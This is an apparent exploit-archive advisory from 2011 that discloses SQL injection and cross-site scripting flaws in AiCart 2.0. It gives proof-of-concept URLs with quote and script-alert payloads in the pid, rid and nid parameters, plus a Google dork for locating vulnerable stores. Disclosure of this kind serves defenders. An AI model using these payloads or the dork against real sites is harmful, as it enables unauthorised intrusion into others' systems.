Home / exploitsPDF  

AiCart 2.0 Cross Site Scripting / SQL Injection

Posted on 19 June 2011

=================================[ AiCart 2.0 Multiple Vulnerabilities ]=================================== == Infos ================================================================================================== [ Date ] [ 18.06.2011 ] [ Software URL ] [ http://www.aicart.ca/ ] [ Version ] [ 2.0 ] [ Google Dork ] [ inurl:'/store.php?action=view_product pid=' ] [ System ] [ PHP ] [ Testing System ] [ Fedora ] [ Risk Level ] [ High ] [ CVE ] [ - ] == Autor Details ========================================================================================== [ Autor ] [ takeshix ] [ Autor Contact ] [ takeshix.query@googlemail.com<script type="text/javascript"> /* <![CDATA[ */ (function(){try{var s,a,i,j,r,c,l=document.getElementById("__cf_email__");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})(); /* ]]> */ </script> ] == PoC ==================================================================================================== [ SQLi ] http://localhost/store.php?action=view_product?pid=' [ SQLi ] http://localhost/store.php?rid=' [ SQLi ] http://localhost/news.php?nid='&action=view [ XSS ] http://localhost/store.php?action=view_product?pid=<script>alert('takeshix')</script> [ XSS ] http://localhost/store.php?rid=<script>alert('takeshix')</script> [ Xss ] http://localhost/news.php?nid=<script>alert('takeshix')</script>&action=view == Greez ================================================================================================== [ hackademics ] [ DSU ] [ UNITS ] =============================================[ hacktivistas ]==============================================

 

TOP